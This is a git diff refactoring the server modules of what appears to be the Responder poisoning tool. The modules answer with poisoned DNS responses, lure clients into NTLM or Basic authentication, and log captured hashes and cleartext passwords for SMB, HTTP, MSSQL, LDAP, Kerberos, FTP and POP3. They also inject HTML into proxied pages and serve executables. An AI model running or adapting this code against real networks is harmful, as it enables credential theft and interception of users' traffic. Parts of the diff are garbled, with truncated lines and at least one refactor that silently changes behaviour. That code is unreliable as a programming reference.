diff --git a/servers/Browser.py b/servers/Browser.py
index 42c5443..20a4210 100644
--- a/servers/Browser.py
+++ b/servers/Browser.py
@@ -14,16 +14,13 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import socket
-import struct
-import settings
-
from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler
from utils import *
+
def WorkstationFingerPrint(data):
- Role = {
+ return {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
@@ -35,12 +32,11 @@ def WorkstationFingerPrint(data):
"\x06\x02" :"Windows 8/Server 2012",
"\x06\x03" :"Windows 8.1/Server 2012R2",
"\x10\x00" :"Windows 10/Server 2016",
- }
+ }.get(data, 'Unknown')
- return Role[data] if data in Role else "Unknown"
def RequestType(data):
- Type = {
+ return {
"\x01": 'Host Announcement',
"\x02": 'Request Announcement',
"\x08": 'Browser Election',
@@ -51,30 +47,23 @@ def RequestType(data):
"\x0d": 'Master Announcement',
"\x0e": 'Reset Browser State Announcement',
"\x0f": 'Local Master Announcement',
- }
+ }.get(data, 'Unknown')
- return Type[data] if data in Type else "Unknown"
def PrintServerName(data, entries):
- if entries > 0:
+ if entries <= 0:
+ return None
+ entrieslen = 26 * entries
+ chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
+ ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
- entrieslen = 26*entries
- chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
- ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
+ l = []
+ for x in ServerName:
+ fingerprint = WorkstationFingerPrint(x[16:18])
+ name = x[:16].replace('\x00', '')
+ l.append('%s (%s)' % (name, fingerprint))
+ return l
- l = []
- for x in ServerName:
- FP = WorkstationFingerPrint(x[16:18])
- Name = x[:16].replace('\x00', '')
-
- if FP:
- l.append(Name + ' (%s)' % FP)
- else:
- l.append(Name)
-
- return l
-
- return None
def ParsePacket(Payload):
PayloadOffset = struct.unpack('.
-import re
-
from packets import DNS_Ans
from SocketServer import BaseRequestHandler
from utils import *
@@ -24,13 +22,12 @@ def ParseDNSType(data):
QueryTypeClass = data[len(data)-4:]
# If Type A, Class IN, then answer.
- return True if QueryTypeClass == "\x00\x01\x00\x01" else False
+ return QueryTypeClass == "\x00\x01\x00\x01"
+
+
-# DNS Server class
class DNS(BaseRequestHandler):
-
def handle(self):
-
# Break out if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
return None
@@ -43,7 +40,7 @@ class DNS(BaseRequestHandler):
buff.calculate(data)
soc.sendto(str(buff), self.client_address)
- ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
+ ResolveName = re.sub(r'[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print color("[*] [DNS] Poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0], ResolveName), 2, 1)
except Exception:
@@ -51,9 +48,7 @@ class DNS(BaseRequestHandler):
# DNS Server TCP Class
class DNSTCP(BaseRequestHandler):
-
def handle(self):
-
# Break out if we don't want to respond to this host
if RespondToThisIP(self.client_address[0]) is not True:
return None
@@ -61,7 +56,7 @@ class DNSTCP(BaseRequestHandler):
try:
data = self.request.recv(1024)
- if ParseDNSType(data) and settings.Config.AnalyzeMode == False:
+ if ParseDNSType(data) and settings.Config.AnalyzeMode is False:
buff = DNS_Ans()
buff.calculate(data)
self.request.send(str(buff))
diff --git a/servers/FTP.py b/servers/FTP.py
index 6b1a5e1..0a3f7d0 100644
--- a/servers/FTP.py
+++ b/servers/FTP.py
@@ -14,8 +14,6 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
from utils import *
from SocketServer import BaseRequestHandler
@@ -47,7 +45,7 @@ class FTP(BaseRequestHandler):
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
- 'fullhash': User+':'+Pass
+ 'fullhash': User + ':' + Pass
})
else:
diff --git a/servers/HTTP.py b/servers/HTTP.py
index d55eb6c..f2d7018 100644
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -14,12 +14,9 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import struct
-import settings
-from SocketServer import BaseServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
-from base64 import b64decode, b64encode
+from SocketServer import BaseRequestHandler, StreamRequestHandler
+from base64 import b64decode
from utils import *
from packets import NTLM_Challenge
@@ -72,58 +69,52 @@ def ParseHTTPHash(data, client):
'type': 'NTLMv2',
'client': client,
'host': HostName,
- 'user': Domain+'\\'+User,
- 'hash': NTHash[:32]+":"+NTHash[32:],
+ 'user': Domain + '\\' + User,
+ 'hash': NTHash[:32] + ":" + NTHash[32:],
'fullhash': WriteHash,
})
def GrabCookie(data, host):
- Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
+ Cookie = re.search(r'(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1 and settings.Config.Verbose:
print text("[HTTP] Cookie : %s " % Cookie)
return Cookie
- else:
- return False
+ return False
def GrabHost(data, host):
- Host = re.search('(Host:*.\=*)[^\r\n]*', data)
+ Host = re.search(r'(Host:*.\=*)[^\r\n]*', data)
if Host:
Host = Host.group(0).replace('Host: ', '')
if settings.Config.Verbose:
print text("[HTTP] Host : %s " % color(Host, 3))
return Host
- else:
- return False
+ return False
def GrabReferer(data, host):
- Referer = re.search('(Referer:*.\=*)[^\r\n]*', data)
+ Referer = re.search(r'(Referer:*.\=*)[^\r\n]*', data)
if Referer:
Referer = Referer.group(0).replace('Referer: ', '')
if settings.Config.Verbose:
print text("[HTTP] Referer : %s " % color(Referer, 3))
return Referer
- else:
- return False
+ return False
def WpadCustom(data, client):
- Wpad = re.search('(/wpad.dat|/*\.pac)', data)
+ Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
- else:
- return False
+ return False
def ServeFile(Filename):
with open (Filename, "rb") as bk:
- data = bk.read()
- bk.close()
- return data
+ return bk.read()
def RespondWithFile(client, filename, dlname=None):
@@ -138,9 +129,9 @@ def RespondWithFile(client, filename, dlname=None):
return str(Buffer)
def GrabURL(data, host):
- GET = re.findall('(?<=GET )[^HTTP]*', data)
- POST = re.findall('(?<=POST )[^HTTP]*', data)
- POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)
+ GET = re.findall(r'(?<=GET )[^HTTP]*', data)
+ POST = re.findall(r'(?<=POST )[^HTTP]*', data)
+ POSTDATA = re.findall(r'(?<=\r\n\r\n)[^*]*', data)
if GET and settings.Config.Verbose:
print text("[HTTP] GET request from: %-15s URL: %s" % (host, color(''.join(GET), 5)))
@@ -152,11 +143,11 @@ def GrabURL(data, host):
# Handle HTTP packet sequence.
def PacketSequence(data, client):
- NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
- Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+ NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\\r]*', data)
+ Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\\r]*', data)
# Serve the .exe if needed
- if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
+ if settings.Config.Serve_Always is True or (settings.Config.Serve_Exe is True and re.findall('.exe', data)):
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
# Serve the custom HTML if needed
@@ -189,7 +180,6 @@ def PacketSequence(data, client):
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
print text("[HTTP] WPAD (auth) file sent to %s" % client)
return WPAD_Custom
-
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
@@ -215,28 +205,23 @@ def PacketSequence(data, client):
if settings.Config.Verbose:
print text("[HTTP] WPAD (auth) file sent to %s" % client)
return WPAD_Custom
-
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return str(Buffer)
-
else:
if settings.Config.Basic:
Response = IIS_Basic_401_Ans()
if settings.Config.Verbose:
print text("[HTTP] Sending BASIC authentication request to %s" % client)
-
else:
Response = IIS_Auth_401_Ans()
if settings.Config.Verbose:
print text("[HTTP] Sending NTLM authentication request to %s" % client)
-
return str(Response)
# HTTP Server class
class HTTP(BaseRequestHandler):
-
def handle(self):
try:
while True:
diff --git a/servers/HTTP_Proxy.py b/servers/HTTP_Proxy.py
index 21aa431..836d1ea 100644
--- a/servers/HTTP_Proxy.py
+++ b/servers/HTTP_Proxy.py
@@ -14,8 +14,6 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
import urlparse
import select
import zlib
@@ -43,24 +41,20 @@ def InjectData(data, client, req_uri):
return data
RedirectCodes = ['HTTP/1.1 300', 'HTTP/1.1 301', 'HTTP/1.1 302', 'HTTP/1.1 303', 'HTTP/1.1 304', 'HTTP/1.1 305', 'HTTP/1.1 306', 'HTTP/1.1 307']
-
- if [s for s in RedirectCodes if s in Headers]:
+ if set(RedirectCodes) & set(Headers):
return data
if "content-encoding: gzip" in Headers.lower():
Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
if "content-type: text/html" in Headers.lower():
-
- # Serve the custom HTML if needed
- if settings.Config.Serve_Html:
+ if settings.Config.Serve_Html: # Serve the custom HTML if needed
return RespondWithFile(client, settings.Config.Html_Filename)
- Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
- HasBody = re.findall('(]*>)', Content)
+ Len = ''.join(re.findall(r'(?<=Content-Length: )[^\r\n]*', Headers))
+ HasBody = re.findall(r'(]*>)', Content)
if HasBody and len(settings.Config.HtmlToInject) > 2:
-
if settings.Config.Verbose:
print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
@@ -71,11 +65,9 @@ def InjectData(data, client, req_uri):
Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
data = Headers +'\r\n\r\n'+ Content
-
else:
if settings.Config.Verbose:
print text("[PROXY] Returning unmodified HTTP response")
-
return data
class ProxySock:
@@ -96,19 +88,17 @@ class ProxySock:
def connect(self, address) :
# Store the real remote adress
- (self.host, self.port) = address
+ self.host, self.port = address
# Try to connect to the proxy
for (family, socktype, proto, canonname, sockaddr) in socket.getaddrinfo(
self.proxy_host,
self.proxy_port,
- 0, 0, socket.SOL_TCP) :
+ 0, 0, socket.SOL_TCP):
try:
-
# Replace the socket by a connection to the proxy
self.socket = socket.socket(family, socktype, proto)
self.socket.connect(sockaddr)
-
except socket.error, msg:
if self.socket:
self.socket.close()
@@ -116,7 +106,7 @@ class ProxySock:
continue
break
if not self.socket :
- raise socket.error, ms
+ raise socket.error, msg
# Ask him to create a tunnel connection to the target host/port
self.socket.send(
diff --git a/servers/IMAP.py b/servers/IMAP.py
index c0ae12b..050c9bb 100644
--- a/servers/IMAP.py
+++ b/servers/IMAP.py
@@ -14,16 +14,11 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
-
from utils import *
from SocketServer import BaseRequestHandler
from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
-# IMAP4 Server class
class IMAP(BaseRequestHandler):
-
def handle(self):
try:
self.request.send(str(IMAPGreeting()))
@@ -50,6 +45,5 @@ class IMAP(BaseRequestHandler):
## FIXME: Close connection properly
## self.request.send(str(ditchthisconnection()))
## data = self.request.recv(1024)
-
except Exception:
pass
\ No newline at end of file
diff --git a/servers/Kerberos.py b/servers/Kerberos.py
index b3ac4bf..32bd23e 100644
--- a/servers/Kerberos.py
+++ b/servers/Kerberos.py
@@ -14,10 +14,6 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import struct
-import settings
-
from SocketServer import BaseRequestHandler
from utils import *
@@ -50,8 +46,7 @@ def ParseMSKerbv5TCP(Data):
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
-
- if HashLen == 54:
+ elif HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('.
-import os
-import struct
-import settings
-
from SocketServer import BaseRequestHandler
from packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
from utils import *
def ParseSearch(data):
- Search1 = re.search('(objectClass)', data)
- Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
- Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
-
- if Search1:
+ if re.search(r'(objectClass)', data):
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
- if Search2:
+ elif re.search(r'(?i)(objectClass0*.*supportedCapabilities)', data):
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
- if Search3:
+ elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
def ParseLDAPHash(data, client):
@@ -54,7 +46,7 @@ def ParseLDAPHash(data, client):
UserOffset = struct.unpack('i',data[2:6])[0]
MessageSequence = struct.unpack('.
-import os
-import struct
-import settings
-
from SocketServer import BaseRequestHandler
from packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
from utils import *
@@ -54,6 +50,7 @@ class TDS_Login_Packet:
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
+
def ParseSQLHash(data, client):
SSPIStart = data[8:]
@@ -97,17 +94,17 @@ def ParseSQLHash(data, client):
'fullhash': WriteHash,
})
+
def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5',''))
- Pw = []
+ Pw = ''
for x in Pwd:
- Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
- return ''.join(Pw)
+ Pw += hex(x ^ 0xa5)[::-1][:2].replace("x", "0").decode('hex')
+ return Pw
+
def ParseClearTextSQLPass(data, client):
-
TDS = TDS_Login_Packet(data)
-
SaveToDb({
'module': 'MSSQL',
'type': 'Cleartext',
@@ -120,7 +117,6 @@ def ParseClearTextSQLPass(data, client):
# MSSQL Server class
class MSSQL(BaseRequestHandler):
-
def handle(self):
if settings.Config.Verbose:
print text("[MSSQL] Received connection from %s" % self.client_address[0])
@@ -130,28 +126,24 @@ class MSSQL(BaseRequestHandler):
data = self.request.recv(1024)
self.request.settimeout(0.1)
- # Pre-Login Message
- if data[0] == "\x12":
+
+ if data[0] == "\x12": # Pre-Login Message
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(Buffer)
data = self.request.recv(1024)
- # NegoSSP
- if data[0] == "\x10":
+ if data[0] == "\x10": # NegoSSP
if re.search("NTLMSSP",data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
-
else:
ParseClearTextSQLPass(data,self.client_address[0])
-
- # NegoSSP Auth
- if data[0] == "\x11":
+
+ if data[0] == "\x11": # NegoSSP Auth
ParseSQLHash(data,self.client_address[0])
except socket.timeout:
- pass
self.request.close()
diff --git a/servers/POP3.py b/servers/POP3.py
index 5bdfa7e..00e6b06 100644
--- a/servers/POP3.py
+++ b/servers/POP3.py
@@ -14,22 +14,16 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
-
from utils import *
from SocketServer import BaseRequestHandler
from packets import POPOKPacket
# POP3 Server class
class POP3(BaseRequestHandler):
-
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(str(Packet))
- data = self.request.recv(1024)
-
- return data
+ return self.request.recv(1024)
def handle(self):
try:
@@ -38,7 +32,6 @@ class POP3(BaseRequestHandler):
if data[0:4] == "USER":
User = data[5:].replace("\r\n","")
data = self.SendPacketAndRead()
-
if data[0:4] == "PASS":
Pass = data[5:].replace("\r\n","")
@@ -50,11 +43,6 @@ class POP3(BaseRequestHandler):
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
-
- data = self.SendPacketAndRead()
-
- else:
- data = self.SendPacketAndRead()
-
+ self.SendPacketAndRead()
except Exception:
pass
\ No newline at end of file
diff --git a/servers/SMB.py b/servers/SMB.py
index 40c195c..e4632b1 100644
--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -14,84 +14,49 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import struct
-import settings
-
from random import randrange
-from packets import SMBHeader, SMBNegoAnsLM, SMBNegoAns, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
+from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
from SocketServer import BaseRequestHandler
from utils import *
-# Detect if SMB auth was Anonymous
-def Is_Anonymous(data):
+
+def Is_Anonymous(data): # Detect if SMB auth was Anonymous
SecBlobLen = struct.unpack(' 260:
+ return LMhashLen in [0, 1]
+ elif SecBlobLen > 260:
LMhashLen = struct.unpack(' 2:
-
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
-# SMB Server class, NTLMSSP
-class SMB1(BaseRequestHandler):
+class SMB1(BaseRequestHandler): # SMB Server class, NTLMSSP
def handle(self):
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
- if len(data) < 1:
+ if not data:
break
- ##session request 139
- if data[0] == "\x81":
+ if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
- self.request.send(Buffer)
+ self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
- # Negociate Protocol Response
- if data[8:10] == "\x72\x00":
- # \x72 == Negociate Protocol Response
+ if data[8:10] == "\x72\x00": # Negociate Protocol Response
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
@@ -249,8 +207,7 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- # Session Setup AndX Request
- if data[8:10] == "\x73\x00":
+ if data[8:10] == "\x73\x00": # Session Setup AndX Request
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
@@ -264,8 +221,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(4096)
- # STATUS_SUCCESS
- if data[8:10] == "\x73\x00":
+
+ if data[8:10] == "\x73\x00": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
@@ -290,10 +247,9 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- # Tree Connect AndX Request
- if data[8:10] == "\x75\x00":
+
+ if data[8:10] == "\x75\x00": # Tree Connect AndX Request
ParseShare(data)
- # Tree Connect AndX Response
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
@@ -304,8 +260,7 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- ##Tree Disconnect.
- if data[8:10] == "\x71\x00":
+ if data[8:10] == "\x71\x00": #Tree Disconnect
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
@@ -314,9 +269,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##NT_CREATE Access Denied.
- if data[8:10] == "\xa2\x00":
+
+ if data[8:10] == "\xa2\x00": #NT_CREATE Access Denied.
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
@@ -325,9 +279,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##Trans2 Access Denied.
- if data[8:10] == "\x25\x00":
+
+ if data[8:10] == "\x25\x00": # Trans2 Access Denied.
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
@@ -337,8 +290,8 @@ class SMB1(BaseRequestHandler):
self.request.send(Buffer)
data = self.request.recv(1024)
- ##LogOff.
- if data[8:10] == "\x74\x00":
+
+ if data[8:10] == "\x74\x00": # LogOff
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
@@ -351,22 +304,19 @@ class SMB1(BaseRequestHandler):
except socket.timeout:
pass
-# SMB Server class, old version
-class SMB1LM(BaseRequestHandler):
+class SMB1LM(BaseRequestHandler): # SMB Server class, old version
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
-
- ##session request 139
- if data[0] == "\x81":
+
+ if data[0] == "\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##Negotiate proto answer.
- if data[8:10] == "\x72\x00":
+
+ if data[8:10] == "\x72\x00": #Negotiate proto answer.
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
Body.calculate()
@@ -374,23 +324,20 @@ class SMB1LM(BaseRequestHandler):
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
-
- ##Session Setup AndX Request
- if data[8:10] == "\x73\x00":
+
+ if data[8:10] == "\x73\x00": #Session Setup AndX Request
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
-
else:
ParseLMNTHash(data,self.client_address[0])
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
- Packet = str(head)+str(SMBSessEmpty())
- Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
+ Packet = str(head) + str(SMBSessEmpty())
+ Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
self.request.send(Buffer)
data = self.request.recv(1024)
-
except Exception:
self.request.close()
- pass
+ pass
\ No newline at end of file
diff --git a/servers/SMTP.py b/servers/SMTP.py
index aeb3111..9c6b243 100644
--- a/servers/SMTP.py
+++ b/servers/SMTP.py
@@ -14,15 +14,11 @@
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
-import os
-import settings
-
from utils import *
-from base64 import b64decode, b64encode
+from base64 import b64decode
from SocketServer import BaseRequestHandler
from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
-# ESMTP Server class
class ESMTP(BaseRequestHandler):
def handle(self):